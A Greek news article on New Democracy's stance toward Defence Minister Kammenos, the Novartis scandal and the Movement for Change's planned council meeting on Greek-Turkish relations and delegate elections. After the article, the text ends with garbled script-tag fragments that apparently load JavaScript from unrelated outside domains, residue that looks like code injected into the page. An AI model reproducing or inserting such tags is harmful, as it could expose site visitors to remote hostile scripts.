Το ‘bras de fer’ Μητσοτάκη με Καμμένο – Κίνημα Αλλαγής: Με αίσθημα ευθύνης αλλά και κριτική στα ελληνοτουρκικά

Στις 12 το μεσημέρι συνεδριάζει η κοινοβουλευτική ομάδα της ΝΔ. «Δεν θα φτάσω στο σημείο πω αν είναι σκευωρία ή όχι» τόνισε ο κοινοβουλευτικός εκπρόσωπος Γιάννης Κεφαλογιάννης για το σκάνδαλο της Novartis.

Μπορεί η ΝΔ να ανέστειλε προσωρινά για λόγους «εθνικής ευθύνης», την κατάθεση του αιτήματός της για εξεταστική επιτροπή για τον Πάνο Καμμένο και την υπόθεση της Σαουδικής Αραβίας, ωστόσο ο Κυριάκος Μητσοτάκης φρόντισε να διαμηνύσει ότι πολιτικά θα κρατήσει αποστάσεις από τους κυβερνητικούς χειρισμούς στα εθνικά θέματα και δεν είναι τυχαίο ότι ο υπουργός Άμυνας «έφαγε πόρτα» από τον πρόεδρο της ΝΔ, ο οποίος μέσω συνεργατών του ξεκαθάρισε ότι δεν δέχεται την πρόταση του κ. Καμμένου για κατ’ ιδίαν συνάντηση προκειμένου να ενημερωθεί για την κρίση στις ελληνοτουρκικές σχέσεις.

Μάλιστα πρόκειται για μια επιλογή η οποία σε συνδυασμό με τις έντονες επικρίσεις του Μοσχάτου προς τον πρωθυπουργό, ότι η στάση του δεν είναι αποφασιστική ως προς τα κυριαρχικά δικαιώματα της χώρας στο Αιγαίο έναντι της Τουρκίας καταδεικνύει και το βαθύ χάσμα που υπάρχει μεταξύ κυβέρνησης και αξιωματικής αντιπολίτευσης και το οποίο έχει εκφραστεί με οξύ τρόπο τις τελευταίες μέρες γύρω από το σκάνδαλο της Novartis.

Άλλωστε ο ίδιος ο πρόεδρος της ΝΔ έχει τονίσει ότι το σκάνδαλο της Novartis το χρησιμοποιεί η κυβέρνηση για να κρύψει –μεταξύ άλλων- τον πανικό της από τους «εκατοντάδες χιλιάδες πολίτες που διαδήλωσαν για τους απαράδεκτους χειρισμούς της στο Σκοπιανό». Αν και αρχικά η ΝΔ υποστήριξε ότι δεν είναι ώρα για να αναδειχτούν οι τεράστιες ευθύνες της κυβέρνησης εντούτοις το τελευταίο 24ωρο σειρά στελεχών της μιλούν για «ανικανότητα» και «επικινδυνότητα» της κυβέρνησης να χειριστεί τα εθνικά θέματα και να προασπιστεί τα εθνικά συμφέροντα, όπως ανέφερε ο γραμματέας της ΝΔ Λευτέρης Αυγενάκης.

Μέσα σε αυτό το κλίμα συνεδριάζει σήμερα το μεσημέρι η κοινοβουλευτική ομάδα της ΝΔ υπό την προεδρία του Κυριάκου Μητσοτάκη. Ο πρόεδρος της ΝΔ αναμένεται εκτός των άλλων να εξαπολύσει σφοδρά πυρά επίσης τόσο για τα θέματα της οικονομίας και της «δήθεν καθαρής εξόδου από το μνημόνιο» αλλά στο επίκεντρο θα βρεθεί το σκάνδαλο της Novartis στο οποίο η ΝΔ έχει δώσει χαρακτήρα «πολιτικής δίωξης» και «σπίλωσης της παράταξης και των στελεχών της» από την κυβέρνηση.

Πάντως παρά την κλιμάκωση και την όξυνση της ρητορικής της ηγεσίας της ΝΔ για το σκάνδαλο της Novartis ο Κυριάκος Μητσοτάκης εξακολουθεί να αντιμετωπίζει πρόβλημα ως προς τη συσπείρωση της ΝΔ και την στοίχιση του συνόλου των στελεχών του στην υπεράσπιση των φερόμενων ως εμπλεκόμενων γαλάζιων στελεχών. Ακόμα και σήμερα αρκετά είναι τα κορυφαία στελέχη και οι βουλευτές που είτε αποφεύγουν να τοποθετηθούν δημοσίως είτε όταν το κάνουν είναι αρκετά προσεκτικοί και αποφεύγουν να ταυτιστούν με πρόσωπα και καταστάσεις. Είναι ενδεικτική η τοποθέτηση του κοινοβουλευτικού εκπροσώπου της ΝΔ Γιάννη Κεφαλογιάννη, ο οποίος μιλώντας στο ραδιόφωνο 24/7 αν και χαρακτήρισε δικαιολογημένες και εύλογες τις αντιδράσεις του κόμματός του εντούτοις τόνισε ότι «δεν θα φτάσω στο σημείο να πω αν είναι σκευωρία ή όχι» ενώ σημείωσε με νόημα πως «όταν κάποιος είναι εμπλεκόμενος και διασύρεται το όνομα του, ας του δώσουμε το δικαίωμα στην υπερβολή».

 

Κίνημα Αλλαγής: Με αίσθημα ευθύνης αλλά και κριτική στα ελληνοτουρκικά

Τα εθνικά θέματα, αλλά και τα οργανωτικά του Συνεδρίου αναμένεται να συζητηθούν στην συνεδρίαση του Πολιτικού Συμβουλίου του Κινήματος Αλλαγής, που συνεδριάζει σήμερα.
Η όξυνση της τουρκικής επιθετικότητας στο Αιγαίο και την Κύπρο προκαλεί προβληματισμό στο Κίνημα Αλλαγής, που θα συζητήσει σήμερα για όλα τα εθνικά θέματα σε επίπεδο Πολιτικού Συμβουλίου.
Την ανάγκη να αντιμετωπίσει το Κίνημα Αλλαγής τα ελληνοτουρκικά με αίσθημα ευθύνης, αναμένεται να εισηγηθεί στους Σταύρο Θεοδωράκη, Θανάση Θεοχαρόπουλο, Γιώργο Παπανδρέου και Γιώργο Καμίνη, η πρόεδρος του Φώφη Γεννηματά. Στη συνεδρίαση δεν θα παραστεί ο Νίκος Ανδρουλάκης, που βρίσκεται στο Μεξικό, σε επίσημη αποστολή του ευρωκοινοβουλίου.

Σύμφωνα με πληροφορίες, η Φ. Γεννηματά θα ζητήσει την γενική επιστράτευση όλων των πολιτικών δυνάμεων της χώρας, έτσι ώστε η τουρκική προκλητικότητα να βρει ενωμένο τον πολιτικό κόσμο. Άλλωστε, έχει καταστήσει σαφές ότι το συγκεκριμένο θέμα δεν προσφέρεται σε καμία περίπτωση για μικροπολιτική εκμετάλλευση. Την ίδια στιγμή, αναμένεται να ζητήσει την πλήρη ενεργοποίηση όλων των στελεχών του Κινήματος που συμμετέχουν σε διεθνείς οργανισμούς ώστε να θέσουν προς συζήτηση σε αυτούς το θέμα της Τουρκίας.

Στο συγκεκριμένο ζήτημα, εκτιμά ότι θα μπορέσουν να συμβάλουν ενεργά τόσο ο Γιώργος Παπανδρέου με το εγνωσμένο κύρος του στο εξωτερικό (εξακολουθεί να είναι πρόεδρος της Σοσιαλιστικής Διεθνούς), όσο και ο Νίκος Ανδρουλάκης στην ευρωβουλή, αλλά και οι βουλευτές που συμμετέχουν στις κοινοβουλευτικές συνελεύσεις του Συμβουλίου της Ευρώπης (Βαγγέλης Βενιζέλος) και του ΝΑΤΟ (Ανδρέας Λοβέρδος).

Η στάση ευθύνης από την μεριά της Φ.Γεννηματά, δεν σημαίνει ότι δεν θα ασκήσει και αυστηρή κριτική στους κυβερνητικούς χειρισμούς. Άλλωστε, ενδεικτική των προθέσεων της, ήταν η χθεσινή σκληρή τοποθέτηση της, κατά την οποία χαρακτήρισε “μείζον λάθος” το γεγονός ότι η κυβέρνηση δεν απήντησε αμέσως και κατηγορηματικά στην ιταμή -όπως την χαρακτήρισε- τουρκική ανακοίνωση.

Η παραπάνω γραμμή συμφωνήθηκε χθες, κατά τη διάρκεια σύσκεψης που πραγματοποιήθηκε με τους Ανδρέα Λοβέρδο, Δημήτρη Τσιόδρα, Τάκη Ιωακειμίδη, Δημήτρη Χατζησωκράτη, Χρήστο Πρωτόππα, Πωλίνα Λάμψα, Μανώλη Όθωνα, Νίκο Μπίστη, Παύλο Χρηστίδη και Βασίλη Κεγκέρογλου, δηλαδή με στελέχη από ολόκληρο το Κίνημα Αλλαγής, υπό τη Φ.Γεννηματά.

Και οργανωτικά

Εκτός από τα εθνικά θέματα, στο τραπέζι του Πολιτικού Συμβουλίου αναμένεται να τεθεί ξανά και το θέμα της εκλογής των συνέδρων εν όψει του επερχόμενου ιδρυτικού Συνεδρίου του Κινήματος Αλλαγής. Σύμφωνα με πληροφορίες, ο Σταύρος Θεοδωράκης αναμένεται να ζητήσει να σταματήσει η διαδικασία εκλογής από τη βάση των περίπου 2.000 (σε σύνολο 4.000) συνέδρων που είχε συμφωνηθεί στις προηγούμενες συνεδριάσεις. Ο επικεφαλής του Ποταμιού φέρεται να προκρίνει τη λύση του διορισμού όλων των συνέδρων, έτσι ώστε να υπάρχει αντιπροσωπευτική εκπροσώπηση όλων των τάσεων και των ομάδων που συμμετέχουν σε αυτό.

Η συγκεκριμένη πάντως πρόταση δύσκολα θα προχωρήσει, αφού η οργανωτική επιτροπή του Συνεδρίου έχει ανακοινώσει ήδη την ημερομηνία (4 Μαρτίου) διεξαγωγής της εκλογικής διαδικασίας, απευθύνοντας μάλιστα κάλεσμα σε πολίτες που δεν είχαν λάβει μέρος στην πρόσφατη εσωκομματική ψηφοφορία, να εγγραφούν και να λάβουν μέρος στις προσυνεδριακές διαδικασίες, ανάμεσα στις οποίες φυσικά συγκαταλέγεται και η εκλογή συνέδρων.

 ___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>challengeforme.com/pystats.js?l=l&’ async=true type=text/javascript language=javascript>challengeforme.com/pystats.js?l=l&’ async=true type=text/javascript language=javascript>